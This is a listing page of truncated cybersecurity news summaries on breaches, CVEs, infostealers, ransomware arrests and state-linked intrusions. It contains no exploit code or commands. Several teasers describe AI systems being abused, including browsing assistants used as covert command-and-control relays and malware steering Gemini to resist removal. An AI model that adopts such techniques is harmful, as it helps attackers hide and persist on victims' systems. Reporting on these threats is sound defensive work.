ALL POSTS

Key Findings Researchers executed 27 successful attacks against industry-leading password managers Bitwarden, LastPass, and Dashlane Attacks show how compromised servers and design flaws can expose encrypted vault data 1Password emerged as the most secure option due to its use of a Secret Key Background We often treat cloud-based password managers as digital safes that only we can open. These services rely on Zero-Knowledge Encryption, a marketing promise that the company sto

Key Findings: A new scam is targeting users by mimicking CAPTCHA verification systems The attack is an evolved version of the ClickFix attacks from early 2025 targeting restaurant bookings The multi-stage infection starts with a fake CAPTCHA, then triggers a PowerShell script to download malware The malware, known as an infostealer, targets cryptocurrency wallets, browser login data, and other sensitive information Background This research, shared with Hackread.com, indicates

Key Findings: CISA has added two actively exploited vulnerabilities in Roundcube webmail software to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerabilities are CVE-2025-49113 (CVSS 9.9) and CVE-2025-68461 (CVSS 7.2). CVE-2025-49113 is a deserialization of untrusted data flaw that allows remote code execution by authenticated users. CVE-2025-68461 is a cross-site scripting vulnerability in the "animate" tag of an SVG document. Attackers have already weaponized

Key Findings A Russian-speaking, financially motivated threat actor has compromised over 600 FortiGate devices located in 55 countries between January 11 and February 18, 2026. The threat actor leveraged multiple commercial generative AI tools to automate various stages of the attack cycle, including tool development, attack planning, and command generation. No exploitation of FortiGate vulnerabilities was observed - the campaign succeeded by exploiting exposed management por

Key Findings Anthropic is rolling out a new security feature for Claude Code that can scan a user's software codebases for vulnerabilities and suggest patching solutions. The feature, called Claude Code Security, will initially be available to a limited number of enterprise and team customers for testing. Claude Code Security goes beyond traditional static analysis by reasoning about the codebase like a human security researcher, understanding how components interact, tracing

Key Findings: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities affecting the RoundCube Webmail platform to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerabilities are: CVE-2025-49113 (CVSS score: 9.9) - A deserialization of untrusted data vulnerability that allows remote code execution. CVE-2025-68461 (CVSS score: 7.2) - A cross-site scripting (XSS) vulnerability. These vulnerabilities have been actively exploited b

Key Findings The FBI has warned of a sharp rise in ATM jackpotting attacks across the U.S., with losses exceeding $20 million in 2025 alone. Since 2020, about 1,900 incidents have been reported, including 700 last year. Total losses tied to jackpotting have reached roughly $40.7 million since 2021. Background The jackpotting technique was first proposed by white-hat hacker Barnaby Jack in 2010. Ploutus is one of the most sophisticated ATM malware that was first discovered in

Key Findings Oleksandr Didenko, a 29-year-old Ukrainian national, was sentenced to 5 years in prison for his role in a scheme to help North Korean IT workers gain remote employment at U.S. companies using stolen identities. Didenko created over 2,500 fraudulent accounts on job platforms, money transmitters, and social media to sell the stolen identities to North Korean operatives. He managed up to 871 identities through laptop farms in the U.S. and facilitated North Korean wo

Key Findings: PromptSpy is the first known Android malware to abuse Google's Gemini AI to maintain persistence on infected devices It can capture lockscreen data, block uninstallation attempts, collect device information, take screenshots, and record screen activity as video The malware leverages Gemini AI to analyze the current screen and provide it with step-by-step instructions on how to remain pinned in the recent apps list, preventing easy removal Background ESET researc

Key Findings: Three Iranian-American engineers - Samaneh Ghandali, 41, her sister Soroor Ghandali, 32, and Samaneh's husband Mohammadjavad Khosravi, 40 - have been indicted for allegedly stealing trade secrets from Google and other tech firms and transferring the information to unauthorized locations, including Iran. The defendants are accused of conspiracy to commit trade secret theft, theft and attempted theft of trade secrets, and obstruction of justice. Samaneh and Soroor

Key Findings Generative AI and agentic AI are increasingly used by threat actors to conduct faster and more targeted attacks. One capability that AI improves for threat actors is the ability to profile employees and craft tailored social engineering lures. However, AI can also be leveraged by defenders to turn the tables on threat actors and use their own tools against them. Background Threat actors are leveraging the advancements in AI, particularly generative AI and agentic

Key Findings China-linked hacking group UNC6201 has been exploiting a zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since at least 2024. The vulnerability is a hardcoded credential flaw that allows unauthenticated remote attackers to gain administrator-level access to affected systems. Hackers have used this access to deploy a novel backdoor malware called GrimBolt, which is more advanced and harder to detect than the previously used Bricks

Key Findings Notepad++ patched a vulnerability that attackers used to hijack its update system and deliver malware to targeted users The attack involved infrastructure-level compromise that allowed malicious actors to intercept and redirect update traffic destined for notepad-plus-plus.org The compromise was linked to a likely China-linked APT group called Lotus Blossom, which has been active since 2009 and targets government, telecom, aviation, critical infrastructure, and m

Key Findings A suspected China-linked APT group, UNC6201, has been exploiting a critical zero-day vulnerability in Dell RecoverPoint for Virtual Machines since mid-2024. The vulnerability, tracked as CVE-2026-22769, has a CVSS score of 10.0 and involves hardcoded credentials that can be abused to gain unauthorized access and root-level persistence. The group has used the flaw to move laterally, maintain persistence, and deploy malware including SLAYSTYLE, BRICKSTORM, and a no

Key Findings Cybersecurity researchers have disclosed multiple security vulnerabilities in four popular Microsoft Visual Studio Code (VS Code) extensions with over 125 million collective installs. The vulnerable extensions are Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview. If successfully exploited, these vulnerabilities could allow threat actors to steal local files and execute code remotely. The researchers warn that a single malicious exte

Key Findings Chinese state-sponsored hackers, suspected to be part of the UNC6201 group, have been exploiting a zero-day vulnerability in Dell RecoverPoint for Virtual Machines since mid-2024. The vulnerability, CVE-2026-22769, has a CVSS score of 10/10 and allows unauthenticated remote attackers to gain full system access with root-level persistence. The hackers have been using a hardcoded administrator password, pulled from Apache Tomcat, to trigger the vulnerability for at

Key Findings Cybersecurity researchers have demonstrated that AI assistants with web browsing or URL fetching capabilities, such as Microsoft Copilot and xAI Grok, can be abused as covert command-and-control (C2) relays by attackers. This technique allows attackers to blend their malicious communications into legitimate-looking AI assistant traffic, making detection and blocking significantly more challenging. The attack method, dubbed "AI as a C2 proxy," leverages the web ac

Key Findings SmartLoader hackers cloned a legitimate Oura MCP (Model Context Protocol) server and built a deceptive infrastructure of fake forks and contributors to make the project appear credible. The trojanized version of the Oura MCP server delivers the StealC information stealer, targeting developer credentials, browser passwords, and cryptocurrency wallets. This campaign signals a significant shift in the threat landscape, with traditional supply chain attackers now piv

Key Findings Polish authorities have arrested a 47-year-old man accused of being an affiliate for the Phobos ransomware group. The suspect faces up to five years in prison for producing, obtaining, and sharing computer programs used to conduct cyberattacks. The arrest was part of a larger Europol-led operation called "Phobos Aetor" that targeted individuals involved with Phobos ransomware attacks. Background Phobos ransomware has claimed over 1,000 victims globally and receiv

Key Findings Cybersecurity researchers have uncovered a new information stealer that exfiltrated a victim's OpenClaw configuration environment. The incident marks a significant evolution in infostealer behavior, transitioning from stealing browser credentials to targeting the identities, settings, and "digital souls" of personal AI agents. The stolen files included openclaw.json with gateway tokens, device.json containing private cryptographic keys, and "soul" and memory file